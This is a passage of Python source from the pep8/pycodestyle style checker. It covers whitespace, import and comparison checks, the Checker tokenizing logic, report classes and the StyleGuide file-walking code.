text in '([' and
start != prev_end and
(prev_type == tokenize.NAME or prev_text in '}])') and
# Syntax "class A (B):" is allowed, but avoid it
(index < 2 or tokens[index - 2][1] != 'class') and
# Allow "return (a.foo for a in range(5))"
not keyword.iskeyword(prev_text)):
yield prev_end, "E211 whitespace before '%s'" % text
prev_type = token_type
prev_text = text
prev_end = end
def whitespace_around_operator(logical_line):
r"""Avoid extraneous whitespace around an operator.
Okay: a = 12 + 3
E221: a = 4 + 5
E222: a = 4 + 5
E223: a = 4\t+ 5
E224: a = 4 +\t5
"""
for match in OPERATOR_REGEX.finditer(logical_line):
before, after = match.groups()
if '\t' in before:
yield match.start(1), "E223 tab before operator"
elif len(before) > 1:
yield match.start(1), "E221 multiple spaces before operator"
if '\t' in after:
yield match.start(2), "E224 tab after operator"
elif len(after) > 1:
yield match.start(2), "E222 multiple spaces after operator"
def missing_whitespace_around_operator(logical_line, tokens):
r"""Surround operators with a single space on either side.
- Always surround these binary operators with a single space on
either side: assignment (=), augmented assignment (+=, -= etc.),
comparisons (==, <, >, !=, <=, >=, in, not in, is, is not),
Booleans (and, or, not).
- If operators with different priorities are used, consider adding
whitespace around the operators with the lowest priorities.
Okay: i = i + 1
Okay: submitted += 1
Okay: x = x * 2 - 1
Okay: hypot2 = x * x + y * y
Okay: c = (a + b) * (a - b)
Okay: foo(bar, key='word', *args, **kwargs)
Okay: alpha[:-i]
E225: i=i+1
E225: submitted +=1
E225: x = x /2 - 1
E225: z = x **y
E226: c = (a+b) * (a-b)
E226: hypot2 = x*x + y*y
E227: c = a|b
E228: msg = fmt%(errno, errmsg)
"""
parens = 0
need_space = False
prev_type = tokenize.OP
prev_text = prev_end = None
for token_type, text, start, end, line in tokens:
if token_type in SKIP_COMMENTS:
continue
if text in ('(', 'lambda'):
parens += 1
elif text == ')':
parens -= 1
if need_space:
if start != prev_end:
# Found a (probably) needed space
if need_space is not True and not need_space[1]:
yield (need_space[0],
"E225 missing whitespace around operator")
need_space = False
elif text == '>' and prev_text in ('<', '-'):
# Tolerate the "<>" operator, even if running Python 3
# Deal with Python 3's annotated return value "->"
pass
else:
if need_space is True or need_space[1]:
# A needed trailing space was not found
yield prev_end, "E225 missing whitespace around operator"
elif prev_text != '**':
code, optype = 'E226', 'arithmetic'
if prev_text == '%':
code, optype = 'E228', 'modulo'
elif prev_text not in ARITHMETIC_OP:
code, optype = 'E227', 'bitwise or shift'
yield (need_space[0], "%s missing whitespace "
"around %s operator" % (code, optype))
need_space = False
elif token_type == tokenize.OP and prev_end is not None:
if text == '=' and parens:
# Allow keyword args or defaults: foo(bar=None).
pass
elif text in WS_NEEDED_OPERATORS:
need_space = True
elif text in UNARY_OPERATORS:
# Check if the operator is being used as a binary operator
# Allow unary operators: -123, -x, +1.
# Allow argument unpacking: foo(*args, **kwargs).
if (prev_text in '}])' if prev_type == tokenize.OP
else prev_text not in KEYWORDS):
need_space = None
elif text in WS_OPTIONAL_OPERATORS:
need_space = None
if need_space is None:
# Surrounding space is optional, but ensure that
# trailing space matches opening space
need_space = (prev_end, start != prev_end)
elif need_space and start == prev_end:
# A needed opening space was not found
yield prev_end, "E225 missing whitespace around operator"
need_space = False
prev_type = token_type
prev_text = text
prev_end = end
def whitespace_around_comma(logical_line):
r"""Avoid extraneous whitespace after a comma or a colon.
Note: these checks are disabled by default
Okay: a = (1, 2)
E241: a = (1, 2)
E242: a = (1,\t2)
"""
line = logical_line
for m in WHITESPACE_AFTER_COMMA_REGEX.finditer(line):
found = m.start() + 1
if '\t' in m.group():
yield found, "E242 tab after '%s'" % m.group()[0]
else:
yield found, "E241 multiple spaces after '%s'" % m.group()[0]
def whitespace_around_named_parameter_equals(logical_line, tokens):
r"""Don't use spaces around the '=' sign in function arguments.
Don't use spaces around the '=' sign when used to indicate a
keyword argument or a default parameter value.
Okay: def complex(real, imag=0.0):
Okay: return magic(r=real, i=imag)
Okay: boolean(a == b)
Okay: boolean(a != b)
Okay: boolean(a <= b)
Okay: boolean(a >= b)
Okay: def foo(arg: int = 42):
E251: def complex(real, imag = 0.0):
E251: return magic(r = real, i = imag)
"""
parens = 0
no_space = False
prev_end = None
annotated_func_arg = False
in_def = logical_line.startswith('def')
message = "E251 unexpected spaces around keyword / parameter equals"
for token_type, text, start, end, line in tokens:
if token_type == tokenize.NL:
continue
if no_space:
no_space = False
if start != prev_end:
yield (prev_end, message)
if token_type == tokenize.OP:
if text == '(':
parens += 1
elif text == ')':
parens -= 1
elif in_def and text == ':' and parens == 1:
annotated_func_arg = True
elif parens and text == ',' and parens == 1:
annotated_func_arg = False
elif parens and text == '=' and not annotated_func_arg:
no_space = True
if start != prev_end:
yield (prev_end, message)
if not parens:
annotated_func_arg = False
prev_end = end
def whitespace_before_comment(logical_line, tokens):
r"""Separate inline comments by at least two spaces.
An inline comment is a comment on the same line as a statement. Inline
comments should be separated by at least two spaces from the statement.
They should start with a # and a single space.
Each line of a block comment starts with a # and a single space
(unless it is indented text inside the comment).
Okay: x = x + 1 # Increment x
Okay: x = x + 1 # Increment x
Okay: # Block comment
E261: x = x + 1 # Increment x
E262: x = x + 1 #Increment x
E262: x = x + 1 # Increment x
E265: #Block comment
E266: ### Block comment
"""
prev_end = (0, 0)
for token_type, text, start, end, line in tokens:
if token_type == tokenize.COMMENT:
inline_comment = line[:start[1]].strip()
if inline_comment:
if prev_end[0] == start[0] and start[1] < prev_end[1] + 2:
yield (prev_end,
"E261 at least two spaces before inline comment")
symbol, sp, comment = text.partition(' ')
bad_prefix = symbol not in '#:' and (symbol.lstrip('#')[:1] or '#')
if inline_comment:
if bad_prefix or comment[:1] in WHITESPACE:
yield start, "E262 inline comment should start with '# '"
elif bad_prefix and (bad_prefix != '!' or start[0] > 1):
if bad_prefix != '#':
yield start, "E265 block comment should start with '# '"
elif comment:
yield start, "E266 too many leading '#' for block comment"
elif token_type != tokenize.NL:
prev_end = end
def imports_on_separate_lines(logical_line):
r"""Imports should usually be on separate lines.
Okay: import os\nimport sys
E401: import sys, os
Okay: from subprocess import Popen, PIPE
Okay: from myclas import MyClass
Okay: from foo.bar.yourclass import YourClass
Okay: import myclass
Okay: import foo.bar.yourclass
"""
line = logical_line
if line.startswith('import '):
found = line.find(',')
if -1 < found and ';' not in line[:found]:
yield found, "E401 multiple imports on one line"
def module_imports_on_top_of_file(
logical_line, indent_level, checker_state, noqa):
r"""Imports are always put at the top of the file, just after any module
comments and docstrings, and before module globals and constants.
Okay: import os
Okay: # this is a comment\nimport os
Okay: '''this is a module docstring'''\nimport os
Okay: r'''this is a module docstring'''\nimport os
Okay: try:\n import x\nexcept:\n pass\nelse:\n pass\nimport y
Okay: try:\n import x\nexcept:\n pass\nfinally:\n pass\nimport y
E402: a=1\nimport os
E402: 'One string'\n"Two string"\nimport os
E402: a=1\nfrom sys import x
Okay: if x:\n import os
"""
def is_string_literal(line):
if line[0] in 'uUbB':
line = line[1:]
if line and line[0] in 'rR':
line = line[1:]
return line and (line[0] == '"' or line[0] == "'")
allowed_try_keywords = ('try', 'except', 'else', 'finally')
if indent_level: # Allow imports in conditional statements or functions
return
if not logical_line: # Allow empty lines or comments
return
if noqa:
return
line = logical_line
if line.startswith('import ') or line.startswith('from '):
if checker_state.get('seen_non_imports', False):
yield 0, "E402 module level import not at top of file"
elif any(line.startswith(kw) for kw in allowed_try_keywords):
# Allow try, except, else, finally keywords intermixed with imports in
# order to support conditional importing
return
elif is_string_literal(line):
# The first literal is a docstring, allow it. Otherwise, report error.
if checker_state.get('seen_docstring', False):
checker_state['seen_non_imports'] = True
else:
checker_state['seen_docstring'] = True
else:
checker_state['seen_non_imports'] = True
def compound_statements(logical_line):
r"""Compound statements (on the same line) are generally discouraged.
While sometimes it's okay to put an if/for/while with a small body
on the same line, never do this for multi-clause statements.
Also avoid folding such long lines!
Always use a def statement instead of an assignment statement that
binds a lambda expression directly to a name.
Okay: if foo == 'blah':\n do_blah_thing()
Okay: do_one()
Okay: do_two()
Okay: do_three()
E701: if foo == 'blah': do_blah_thing()
E701: for x in lst: total += x
E701: while t < 10: t = delay()
E701: if foo == 'blah': do_blah_thing()
E701: else: do_non_blah_thing()
E701: try: something()
E701: finally: cleanup()
E701: if foo == 'blah': one(); two(); three()
E702: do_one(); do_two(); do_three()
E703: do_four(); # useless semicolon
E704: def f(x): return 2*x
E731: f = lambda x: 2*x
"""
line = logical_line
last_char = len(line) - 1
found = line.find(':')
while -1 < found < last_char:
before = line[:found]
if ((before.count('{') <= before.count('}') and # {'a': 1} (dict)
before.count('[') <= before.count(']') and # [1:2] (slice)
before.count('(') <= before.count(')'))): # (annotation)
lambda_kw = LAMBDA_REGEX.search(before)
if lambda_kw:
before = line[:lambda_kw.start()].rstrip()
if before[-1:] == '=' and isidentifier(before[:-1].strip()):
yield 0, ("E731 do not assign a lambda expression, use a "
"def")
break
if before.startswith('def '):
yield 0, "E704 multiple statements on one line (def)"
else:
yield found, "E701 multiple statements on one line (colon)"
found = line.find(':', found + 1)
found = line.find(';')
while -1 < found:
if found < last_char:
yield found, "E702 multiple statements on one line (semicolon)"
else:
yield found, "E703 statement ends with a semicolon"
found = line.find(';', found + 1)
def explicit_line_join(logical_line, tokens):
r"""Avoid explicit line join between brackets.
The preferred way of wrapping long lines is by using Python's implied line
continuation inside parentheses, brackets and braces. Long lines can be
broken over multiple lines by wrapping expressions in parentheses. These
should be used in preference to using a backslash for line continuation.
E502: aaa = [123, \\n 123]
E502: aaa = ("bbb " \\n "ccc")
Okay: aaa = [123,\n 123]
Okay: aaa = ("bbb "\n "ccc")
Okay: aaa = "bbb " \\n "ccc"
"""
prev_start = prev_end = parens = 0
for token_type, text, start, end, line in tokens:
if start[0] != prev_start and parens and backslash:
yield backslash, "E502 the backslash is redundant between brackets"
if end[0] != prev_end:
if line.rstrip('\r\n').endswith('\\'):
backslash = (end[0], len(line.splitlines()[-1]) - 1)
else:
backslash = None
prev_start = prev_end = end[0]
else:
prev_start = start[0]
if token_type == tokenize.OP:
if text in '([{':
parens += 1
elif text in ')]}':
parens -= 1
def comparison_to_singleton(logical_line, noqa):
r"""Comparison to singletons should use "is" or "is not".
Comparisons to singletons like None should always be done
with "is" or "is not", never the equality operators.
Okay: if arg is not None:
E711: if arg != None:
E711: if None == arg:
E712: if arg == True:
E712: if False == arg:
Also, beware of writing if x when you really mean if x is not None --
e.g. when testing whether a variable or argument that defaults to None was
set to some other value. The other value might have a type (such as a
container) that could be false in a boolean context!
"""
match = not noqa and COMPARE_SINGLETON_REGEX.search(logical_line)
if match:
singleton = match.group(1) or match.group(3)
same = (match.group(2) == '==')
msg = "'if cond is %s:'" % (('' if same else 'not ') + singleton)
if singleton in ('None',):
code = 'E711'
else:
code = 'E712'
nonzero = ((singleton == 'True' and same) or
(singleton == 'False' and not same))
msg += " or 'if %scond:'" % ('' if nonzero else 'not ')
yield match.start(2), ("%s comparison to %s should be %s" %
(code, singleton, msg))
def comparison_negative(logical_line):
r"""Negative comparison should be done using "not in" and "is not".
Okay: if x not in y:\n pass
Okay: assert (X in Y or X is Z)
Okay: if not (X in Y):\n pass
Okay: zz = x is not y
E713: Z = not X in Y
E713: if not X.B in Y:\n pass
E714: if not X is Y:\n pass
E714: Z = not X.B is Y
"""
match = COMPARE_NEGATIVE_REGEX.search(logical_line)
if match:
pos = match.start(1)
if match.group(2) == 'in':
yield pos, "E713 test for membership should be 'not in'"
else:
yield pos, "E714 test for object identity should be 'is not'"
def comparison_type(logical_line):
r"""Object type comparisons should always use isinstance().
Do not compare types directly.
Okay: if isinstance(obj, int):
E721: if type(obj) is type(1):
When checking if an object is a string, keep in mind that it might be a
unicode string too! In Python 2.3, str and unicode have a common base
class, basestring, so you can do:
Okay: if isinstance(obj, basestring):
Okay: if type(a1) is type(b1):
"""
match = COMPARE_TYPE_REGEX.search(logical_line)
if match:
inst = match.group(1)
if inst and isidentifier(inst) and inst not in SINGLETONS:
return # Allow comparison for types which are not obvious
yield match.start(), "E721 do not compare types, use 'isinstance()'"
def python_3000_has_key(logical_line, noqa):
r"""The {}.has_key() method is removed in Python 3: use the 'in' operator.
Okay: if "alph" in d:\n print d["alph"]
W601: assert d.has_key('alph')
"""
pos = logical_line.find('.has_key(')
if pos > -1 and not noqa:
yield pos, "W601 .has_key() is deprecated, use 'in'"
def python_3000_raise_comma(logical_line):
r"""When raising an exception, use "raise ValueError('message')".
The older form is removed in Python 3.
Okay: raise DummyError("Message")
W602: raise DummyError, "Message"
"""
match = RAISE_COMMA_REGEX.match(logical_line)
if match and not RERAISE_COMMA_REGEX.match(logical_line):
yield match.end() - 1, "W602 deprecated form of raising exception"
def python_3000_not_equal(logical_line):
r"""New code should always use != instead of <>.
The older syntax is removed in Python 3.
Okay: if a != 'no':
W603: if a <> 'no':
"""
pos = logical_line.find('<>')
if pos > -1:
yield pos, "W603 '<>' is deprecated, use '!='"
def python_3000_backticks(logical_line):
r"""Backticks are removed in Python 3: use repr() instead.
Okay: val = repr(1 + 2)
W604: val = `1 + 2`
"""
pos = logical_line.find('`')
if pos > -1:
yield pos, "W604 backticks are deprecated, use 'repr()'"
##############################################################################
# Helper functions
##############################################################################
if '' == ''.encode():
# Python 2: implicit encoding.
def readlines(filename):
"""Read the source code."""
with open(filename, 'rU') as f:
return f.readlines()
isidentifier = re.compile(r'[a-zA-Z_]\w*$').match
stdin_get_value = sys.stdin.read
else:
# Python 3
def readlines(filename):
"""Read the source code."""
try:
with open(filename, 'rb') as f:
(coding, lines) = tokenize.detect_encoding(f.readline)
f = TextIOWrapper(f, coding, line_buffering=True)
return [l.decode(coding) for l in lines] + f.readlines()
except (LookupError, SyntaxError, UnicodeError):
# Fall back if file encoding is improperly declared
with open(filename, encoding='latin-1') as f:
return f.readlines()
isidentifier = str.isidentifier
def stdin_get_value():
return TextIOWrapper(sys.stdin.buffer, errors='ignore').read()
noqa = re.compile(r'# no(?:qa|pep8)\b', re.I).search
def expand_indent(line):
r"""Return the amount of indentation.
Tabs are expanded to the next multiple of 8.
>>> expand_indent(' ')
4
>>> expand_indent('\t')
8
>>> expand_indent(' \t')
8
>>> expand_indent(' \t')
16
"""
if '\t' not in line:
return len(line) - len(line.lstrip())
result = 0
for char in line:
if char == '\t':
result = result // 8 * 8 + 8
elif char == ' ':
result += 1
else:
break
return result
def mute_string(text):
"""Replace contents with 'xxx' to prevent syntax matching.
>>> mute_string('"abc"')
'"xxx"'
>>> mute_string("'''abc'''")
"'''xxx'''"
>>> mute_string("r'abc'")
"r'xxx'"
"""
# String modifiers (e.g. u or r)
start = text.index(text[-1]) + 1
end = len(text) - 1
# Triple quotes
if text[-3:] in ('"""', "'''"):
start += 2
end -= 2
return text[:start] + 'x' * (end - start) + text[end:]
def parse_udiff(diff, patterns=None, parent='.'):
"""Return a dictionary of matching lines."""
# For each file of the diff, the entry key is the filename,
# and the value is a set of row numbers to consider.
rv = {}
path = nrows = None
for line in diff.splitlines():
if nrows:
if line[:1] != '-':
nrows -= 1
continue
if line[:3] == '@@ ':
hunk_match = HUNK_REGEX.match(line)
(row, nrows) = [int(g or '1') for g in hunk_match.groups()]
rv[path].update(range(row, row + nrows))
elif line[:3] == '+++':
path = line[4:].split('\t', 1)[0]
if path[:2] == 'b/':
path = path[2:]
rv[path] = set()
return dict([(os.path.join(parent, path), rows)
for (path, rows) in rv.items()
if rows and filename_match(path, patterns)])
def normalize_paths(value, parent=os.curdir):
"""Parse a comma-separated list of paths.
Return a list of absolute paths.
"""
if not value:
return []
if isinstance(value, list):
return value
paths = []
for path in value.split(','):
path = path.strip()
if '/' in path:
path = os.path.abspath(os.path.join(parent, path))
paths.append(path.rstrip('/'))
return paths
def filename_match(filename, patterns, default=True):
"""Check if patterns contains a pattern that matches filename.
If patterns is unspecified, this always returns True.
"""
if not patterns:
return default
return any(fnmatch(filename, pattern) for pattern in patterns)
def _is_eol_token(token):
return token[0] in NEWLINE or token[4][token[3][1]:].lstrip() == '\\\n'
if COMMENT_WITH_NL:
def _is_eol_token(token, _eol_token=_is_eol_token):
return _eol_token(token) or (token[0] == tokenize.COMMENT and
token[1] == token[4])
##############################################################################
# Framework to run all checks
##############################################################################
_checks = {'physical_line': {}, 'logical_line': {}, 'tree': {}}
def register_check(check, codes=None):
"""Register a new check object."""
def _add_check(check, kind, codes, args):
if check in _checks[kind]:
_checks[kind][check][0].extend(codes or [])
else:
_checks[kind][check] = (codes or [''], args)
if inspect.isfunction(check):
args = inspect.getargspec(check)[0]
if args and args[0] in ('physical_line', 'logical_line'):
if codes is None:
codes = ERRORCODE_REGEX.findall(check.__doc__ or '')
_add_check(check, args[0], codes, args)
elif inspect.isclass(check):
if inspect.getargspec(check.__init__)[0][:2] == ['self', 'tree']:
_add_check(check, 'tree', codes, None)
def init_checks_registry():
"""Register all globally visible functions.
The first argument name is either 'physical_line' or 'logical_line'.
"""
mod = inspect.getmodule(register_check)
for (name, function) in inspect.getmembers(mod, inspect.isfunction):
register_check(function)
init_checks_registry()
class Checker(object):
"""Load a Python source file, tokenize it, check coding style."""
def __init__(self, filename=None, lines=None,
options=None, report=None, **kwargs):
if options is None:
options = StyleGuide(kwargs).options
else:
assert not kwargs
self._io_error = None
self._physical_checks = options.physical_checks
self._logical_checks = options.logical_checks
self._ast_checks = options.ast_checks
self.max_line_length = options.max_line_length
self.multiline = False # in a multiline string?
self.hang_closing = options.hang_closing
self.verbose = options.verbose
self.filename = filename
# Dictionary where a checker can store its custom state.
self._checker_states = {}
if filename is None:
self.filename = 'stdin'
self.lines = lines or []
elif filename == '-':
self.filename = 'stdin'
self.lines = stdin_get_value().splitlines(True)
elif lines is None:
try:
self.lines = readlines(filename)
except IOError:
(exc_type, exc) = sys.exc_info()[:2]
self._io_error = '%s: %s' % (exc_type.__name__, exc)
self.lines = []
else:
self.lines = lines
if self.lines:
ord0 = ord(self.lines[0][0])
if ord0 in (0xef, 0xfeff): # Strip the UTF-8 BOM
if ord0 == 0xfeff:
self.lines[0] = self.lines[0][1:]
elif self.lines[0][:3] == '\xef\xbb\xbf':
self.lines[0] = self.lines[0][3:]
self.report = report or options.report
self.report_error = self.report.error
def report_invalid_syntax(self):
"""Check if the syntax is valid."""
(exc_type, exc) = sys.exc_info()[:2]
if len(exc.args) > 1:
offset = exc.args[1]
if len(offset) > 2:
offset = offset[1:3]
else:
offset = (1, 0)
self.report_error(offset[0], offset[1] or 0,
'E901 %s: %s' % (exc_type.__name__, exc.args[0]),
self.report_invalid_syntax)
def readline(self):
"""Get the next line from the input buffer."""
if self.line_number >= self.total_lines:
return ''
line = self.lines[self.line_number]
self.line_number += 1
if self.indent_char is None and line[:1] in WHITESPACE:
self.indent_char = line[0]
return line
def run_check(self, check, argument_names):
"""Run a check plugin."""
arguments = []
for name in argument_names:
arguments.append(getattr(self, name))
return check(*arguments)
def init_checker_state(self, name, argument_names):
""" Prepares a custom state for the specific checker plugin."""
if 'checker_state' in argument_names:
self.checker_state = self._checker_states.setdefault(name, {})
def check_physical(self, line):
"""Run all physical checks on a raw input line."""
self.physical_line = line
for name, check, argument_names in self._physical_checks:
self.init_checker_state(name, argument_names)
result = self.run_check(check, argument_names)
if result is not None:
(offset, text) = result
self.report_error(self.line_number, offset, text, check)
if text[:4] == 'E101':
self.indent_char = line[0]
def build_tokens_line(self):
"""Build a logical line from tokens."""
logical = []
comments = []
length = 0
prev_row = prev_col = mapping = None
for token_type, text, start, end, line in self.tokens:
if token_type in SKIP_TOKENS:
continue
if not mapping:
mapping = [(0, start)]
if token_type == tokenize.COMMENT:
comments.append(text)
continue
if token_type == tokenize.STRING:
text = mute_string(text)
if prev_row:
(start_row, start_col) = start
if prev_row != start_row: # different row
prev_text = self.lines[prev_row - 1][prev_col - 1]
if prev_text == ',' or (prev_text not in '{[('
and text not in '}])'):
text = ' ' + text
elif prev_col != start_col: # different column
text = line[prev_col:start_col] + text
logical.append(text)
length += len(text)
mapping.append((length, end))
(prev_row, prev_col) = end
self.logical_line = ''.join(logical)
self.noqa = comments and noqa(''.join(comments))
return mapping
def check_logical(self):
"""Build a line from tokens and run all logical checks on it."""
self.report.increment_logical_line()
mapping = self.build_tokens_line()
if not mapping:
return
(start_row, start_col) = mapping[0][1]
start_line = self.lines[start_row - 1]
self.indent_level = expand_indent(start_line[:start_col])
if self.blank_before < self.blank_lines:
self.blank_before = self.blank_lines
if self.verbose >= 2:
print(self.logical_line[:80].rstrip())
for name, check, argument_names in self._logical_checks:
if self.verbose >= 4:
print(' ' + name)
self.init_checker_state(name, argument_names)
for offset, text in self.run_check(check, argument_names) or ():
if not isinstance(offset, tuple):
for token_offset, pos in mapping:
if offset <= token_offset:
break
offset = (pos[0], pos[1] + offset - token_offset)
self.report_error(offset[0], offset[1], text, check)
if self.logical_line:
self.previous_indent_level = self.indent_level
self.previous_logical = self.logical_line
self.blank_lines = 0
self.tokens = []
def check_ast(self):
"""Build the file's AST and run all AST checks."""
try:
tree = compile(''.join(self.lines), '', 'exec', PyCF_ONLY_AST)
except (SyntaxError, TypeError):
return self.report_invalid_syntax()
for name, cls, __ in self._ast_checks:
checker = cls(tree, self.filename)
for lineno, offset, text, check in checker.run():
if not self.lines or not noqa(self.lines[lineno - 1]):
self.report_error(lineno, offset, text, check)
def generate_tokens(self):
"""Tokenize the file, run physical line checks and yield tokens."""
if self._io_error:
self.report_error(1, 0, 'E902 %s' % self._io_error, readlines)
tokengen = tokenize.generate_tokens(self.readline)
try:
for token in tokengen:
if token[2][0] > self.total_lines:
return
self.maybe_check_physical(token)
yield token
except (SyntaxError, tokenize.TokenError):
self.report_invalid_syntax()
def maybe_check_physical(self, token):
"""If appropriate (based on token), check current physical line(s)."""
# Called after every token, but act only on end of line.
if _is_eol_token(token):
# Obviously, a newline token ends a single physical line.
self.check_physical(token[4])
elif token[0] == tokenize.STRING and '\n' in token[1]:
# Less obviously, a string that contains newlines is a
# multiline string, either triple-quoted or with internal
# newlines backslash-escaped. Check every physical line in the
# string *except* for the last one: its newline is outside of
# the multiline string, so we consider it a regular physical
# line, and will check it like any other physical line.
#
# Subtleties:
# - we don't *completely* ignore the last line; if it contains
# the magical "# noqa" comment, we disable all physical
# checks for the entire multiline string
# - have to wind self.line_number back because initially it
# points to the last line of the string, and we want
# check_physical() to give accurate feedback
if noqa(token[4]):
return
self.multiline = True
self.line_number = token[2][0]
for line in token[1].split('\n')[:-1]:
self.check_physical(line + '\n')
self.line_number += 1
self.multiline = False
def check_all(self, expected=None, line_offset=0):
"""Run all checks on the input file."""
self.report.init_file(self.filename, self.lines, expected, line_offset)
self.total_lines = len(self.lines)
if self._ast_checks:
self.check_ast()
self.line_number = 0
self.indent_char = None
self.indent_level = self.previous_indent_level = 0
self.previous_logical = ''
self.tokens = []
self.blank_lines = self.blank_before = 0
parens = 0
for token in self.generate_tokens():
self.tokens.append(token)
token_type, text = token[0:2]
if self.verbose >= 3:
if token[2][0] == token[3][0]:
pos = '[%s:%s]' % (token[2][1] or '', token[3][1])
else:
pos = 'l.%s' % token[3][0]
print('l.%s\t%s\t%s\t%r' %
(token[2][0], pos, tokenize.tok_name[token[0]], text))
if token_type == tokenize.OP:
if text in '([{':
parens += 1
elif text in '}])':
parens -= 1
elif not parens:
if token_type in NEWLINE:
if token_type == tokenize.NEWLINE:
self.check_logical()
self.blank_before = 0
elif len(self.tokens) == 1:
# The physical line contains only this token.
self.blank_lines += 1
del self.tokens[0]
else:
self.check_logical()
elif COMMENT_WITH_NL and token_type == tokenize.COMMENT:
if len(self.tokens) == 1:
# The comment also ends a physical line
token = list(token)
token[1] = text.rstrip('\r\n')
token[3] = (token[2][0], token[2][1] + len(token[1]))
self.tokens = [tuple(token)]
self.check_logical()
if self.tokens:
self.check_physical(self.lines[-1])
self.check_logical()
return self.report.get_file_results()
class BaseReport(object):
"""Collect the results of the checks."""
print_filename = False
def __init__(self, options):
self._benchmark_keys = options.benchmark_keys
self._ignore_code = options.ignore_code
# Results
self.elapsed = 0
self.total_errors = 0
self.counters = dict.fromkeys(self._benchmark_keys, 0)
self.messages = {}
def start(self):
"""Start the timer."""
self._start_time = time.time()
def stop(self):
"""Stop the timer."""
self.elapsed = time.time() - self._start_time
def init_file(self, filename, lines, expected, line_offset):
"""Signal a new file."""
self.filename = filename
self.lines = lines
self.expected = expected or ()
self.line_offset = line_offset
self.file_errors = 0
self.counters['files'] += 1
self.counters['physical lines'] += len(lines)
def increment_logical_line(self):
"""Signal a new logical line."""
self.counters['logical lines'] += 1
def error(self, line_number, offset, text, check):
"""Report an error, according to options."""
code = text[:4]
if self._ignore_code(code):
return
if code in self.counters:
self.counters[code] += 1
else:
self.counters[code] = 1
self.messages[code] = text[5:]
# Don't care about expected errors or warnings
if code in self.expected:
return
if self.print_filename and not self.file_errors:
print(self.filename)
self.file_errors += 1
self.total_errors += 1
return code
def get_file_results(self):
"""Return the count of errors and warnings for this file."""
return self.file_errors
def get_count(self, prefix=''):
"""Return the total count of errors and warnings."""
return sum([self.counters[key]
for key in self.messages if key.startswith(prefix)])
def get_statistics(self, prefix=''):
"""Get statistics for message codes that start with the prefix.
prefix='' matches all errors and warnings
prefix='E' matches all errors
prefix='W' matches all warnings
prefix='E4' matches all errors that have to do with imports
"""
return ['%-7s %s %s' % (self.counters[key], key, self.messages[key])
for key in sorted(self.messages) if key.startswith(prefix)]
def print_statistics(self, prefix=''):
"""Print overall statistics (number of errors and warnings)."""
for line in self.get_statistics(prefix):
print(line)
def print_benchmark(self):
"""Print benchmark numbers."""
print('%-7.2f %s' % (self.elapsed, 'seconds elapsed'))
if self.elapsed:
for key in self._benchmark_keys:
print('%-7d %s per second (%d total)' %
(self.counters[key] / self.elapsed, key,
self.counters[key]))
class FileReport(BaseReport):
"""Collect the results of the checks and print only the filenames."""
print_filename = True
class StandardReport(BaseReport):
"""Collect and print the results of the checks."""
def __init__(self, options):
super(StandardReport, self).__init__(options)
self._fmt = REPORT_FORMAT.get(options.format.lower(),
options.format)
self._repeat = options.repeat
self._show_source = options.show_source
self._show_pep8 = options.show_pep8
def init_file(self, filename, lines, expected, line_offset):
"""Signal a new file."""
self._deferred_print = []
return super(StandardReport, self).init_file(
filename, lines, expected, line_offset)
def error(self, line_number, offset, text, check):
"""Report an error, according to options."""
code = super(StandardReport, self).error(line_number, offset,
text, check)
if code and (self.counters[code] == 1 or self._repeat):
self._deferred_print.append(
(line_number, offset, code, text[5:], check.__doc__))
return code
def get_file_results(self):
"""Print the result and return the overall count for this file."""
self._deferred_print.sort()
for line_number, offset, code, text, doc in self._deferred_print:
print(self._fmt % {
'path': self.filename,
'row': self.line_offset + line_number, 'col': offset + 1,
'code': code, 'text': text,
})
if self._show_source:
if line_number > len(self.lines):
line = ''
else:
line = self.lines[line_number - 1]
print(line.rstrip())
print(re.sub(r'\S', ' ', line[:offset]) + '^')
if self._show_pep8 and doc:
print(' ' + doc.strip())
return self.file_errors
class DiffReport(StandardReport):
"""Collect and print the results for the changed lines only."""
def __init__(self, options):
super(DiffReport, self).__init__(options)
self._selected = options.selected_lines
def error(self, line_number, offset, text, check):
if line_number not in self._selected[self.filename]:
return
return super(DiffReport, self).error(line_number, offset, text, check)
class StyleGuide(object):
"""Initialize a PEP-8 instance with few options."""
def __init__(self, *args, **kwargs):
# build options from the command line
self.checker_class = kwargs.pop('checker_class', Checker)
parse_argv = kwargs.pop('parse_argv', False)
config_file = kwargs.pop('config_file', None)
parser = kwargs.pop('parser', None)
# build options from dict
options_dict = dict(*args, **kwargs)
arglist = None if parse_argv else options_dict.get('paths', None)
options, self.paths = process_options(
arglist, parse_argv, config_file, parser)
if options_dict:
options.__dict__.update(options_dict)
if 'paths' in options_dict:
self.paths = options_dict['paths']
self.runner = self.input_file
self.options = options
if not options.reporter:
options.reporter = BaseReport if options.quiet else StandardReport
options.select = tuple(options.select or ())
if not (options.select or options.ignore or
options.testsuite or options.doctest) and DEFAULT_IGNORE:
# The default choice: ignore controversial checks
options.ignore = tuple(DEFAULT_IGNORE.split(','))
else:
# Ignore all checks which are not explicitly selected
options.ignore = ('',) if options.select else tuple(options.ignore)
options.benchmark_keys = BENCHMARK_KEYS[:]
options.ignore_code = self.ignore_code
options.physical_checks = self.get_checks('physical_line')
options.logical_checks = self.get_checks('logical_line')
options.ast_checks = self.get_checks('tree')
self.init_report()
def init_report(self, reporter=None):
"""Initialize the report instance."""
self.options.report = (reporter or self.options.reporter)(self.options)
return self.options.report
def check_files(self, paths=None):
"""Run all checks on the paths."""
if paths is None:
paths = self.paths
report = self.options.report
runner = self.runner
report.start()
try:
for path in paths:
if os.path.isdir(path):
self.input_dir(path)
elif not self.excluded(path):
runner(path)
except KeyboardInterrupt:
print('... stopped')
report.stop()
return report
def input_file(self, filename, lines=None, expected=None, line_offset=0):
"""Run all checks on a Python source file."""
if self.options.verbose:
print('checking %s' % filename)
fchecker = self.checker_class(
filename, lines=lines, options=self.options)
return fchecker.check_all(expected=expected, line_offset=line_offset)
def input_dir(self, dirname):
"""Check all files in this directory and all subdirectories."""
dirname = dirname.rstrip('/')
if self.excluded(dirname):
return 0
counters = self.options.report.counters
verbose = self.options.verbose
filepatterns = self.options.filename
runner = self.runner
for root, dirs, files in os.walk(dirname):
if verbose:
print('directory ' + root)
counters['directories'] += 1
for subdir in sorted(dirs):
if self.excluded(subdir, root):
dirs.remove(subdir)
for filename in sorted(files):
# contain a pattern that matches?
if ((filename_match(filename, filepatterns) and
not self.excluded(filename, root))):
runner(os.path.join(root, filename))
def excluded(self, filename, parent=None):
"""Check if the file should be excluded.
Check if 'options.exclude' contains a pattern that matches filename.
"""
if not self.options.exclude:
return False
basename = os.path.basename(filename)
if filename_match(basename, self.options.exclude):
return True
if parent:
filename = os.path.join(parent, filename)
filename = os.path.abspath(filename)
